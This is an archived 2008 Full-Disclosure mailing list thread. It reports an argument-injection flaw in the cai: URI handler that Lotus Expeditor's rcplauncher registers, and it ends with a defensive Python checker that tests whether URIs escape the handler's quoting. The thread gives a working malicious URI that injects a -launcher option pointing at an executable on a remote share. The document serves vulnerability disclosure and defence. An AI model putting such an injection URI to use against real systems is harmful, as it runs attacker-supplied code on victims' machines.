<div>Very nice, looks a lot like some of my work in URI handler abuse.</div>
<div> </div>
<div>-Nate<br><br> </div>
<div><span class="gmail_quote">On 4/24/08, <b class="gmail_sendername">Thomas Pollet</b> &lt;<a href="mailto:thomas.pollet@gmail.com">thomas.pollet@gmail.com</a>&gt; wrote:</span>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0px 0px 0px 0.8ex; BORDER-LEFT: #ccc 1px solid">Hello,<br><br>I have found that the Lotus Expeditor rcplauncher, as installed by Lotus Symphony and possibly other products, registers a cai: URI handler.<br>
This handler executes<br>
<div>"D:\Program Files\IBM\Lotus\Symphony\framework\rcp\rcplauncher.exe" -config notes -com.ibm.rcp.portal.app.ui#openCA "%1"<br>The rcplauncher process accepts various arguments which can be abused to execute arbitrary code.<br>The argument to the -launcher option, for example, is an executable that will be executed.<br>
<br>Malicious URI example:<br>cai:"%20-launcher%20\\6.6.6.6\d$\trojan<br><br>Regards,<br><a onclick="return top.js.OpenExtLink(window,event,this)" href="http://thomas.pollet.googlepages.com/" target="_blank">Thomas Pollet</a><br>
<br> </div><br><br><br>_______________________________________________<br>Full-Disclosure - We believe in it.<br>Charter: <a onclick="return top.js.OpenExtLink(window,event,this)" href="http://lists.grok.org.uk/full-disclosure-charter.html" target="_blank">http://lists.grok.org.uk/full-disclosure-charter.html</a><br>
Hosted and sponsored by Secunia - <a onclick="return top.js.OpenExtLink(window,event,this)" href="http://secunia.com/" target="_blank">http://secunia.com/</a><br></blockquote></div><br>
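<div>An added example, not part of either message and not IBM's code: a check that expands the handler command quoted above for a given URI and reports whether the URI stayed inside the single quoted "%1" argument. It assumes the URI is percent-decoded before substitution (as the %20 in the quoted example implies) and uses a simplified argument splitter; <code>split_args</code> and <code>audit_uri</code> are hypothetical helper names.</div>

```python
from urllib.parse import unquote

# Handler command line as quoted in the advisory above.
HANDLER = (r'"D:\Program Files\IBM\Lotus\Symphony\framework\rcp\rcplauncher.exe"'
           r' -config notes -com.ibm.rcp.portal.app.ui#openCA "%1"')

def split_args(cmdline):
    """Simplified Windows-style split: double quotes toggle quoting, unquoted
    whitespace separates arguments, backslashes are literal. Assumption: the
    backslash-before-quote escaping rules are left out."""
    args, cur, in_quotes, started = [], [], False, False
    for ch in cmdline:
        if ch == '"':
            in_quotes, started = not in_quotes, True
        elif ch.isspace() and not in_quotes:
            if started:
                args.append("".join(cur))
            cur, started = [], False
        else:
            cur.append(ch)
            started = True
    if started:
        args.append("".join(cur))
    return args

def audit_uri(uri, template=HANDLER):
    """Expand %1 as the handler would and report any arguments the URI added.
    Assumption: the URI is percent-decoded before it is substituted."""
    decoded = unquote(uri)
    expected = split_args(template.replace("%1", "PLACEHOLDER"))
    slot = expected.index("PLACEHOLDER")
    actual = split_args(template.replace("%1", decoded))
    # Safe only if the URI is exactly one argument, in the slot meant for it.
    contained = len(actual) == len(expected) and actual[slot] == decoded
    return {"argv": actual, "contained": contained,
            "injected": [] if contained else actual[slot + 1:]}

if __name__ == "__main__":
    samples = [
        "cai:some%20thing",                          # constructed benign input
        r'cai:"%20-launcher%20\\6.6.6.6\d$\trojan',  # URI from the advisory
    ]
    for uri in samples:
        result = audit_uri(uri)
        print(uri, "->", "contained" if result["contained"] else
              "escapes quotes, extra args: %r" % result["injected"])
```

<div>An encoded space alone stays inside the quotes; it is the literal double quote in the URI that closes the "%1" argument early, so a handler or dispatcher that rejects or escapes that character keeps the URI as one argument.</div>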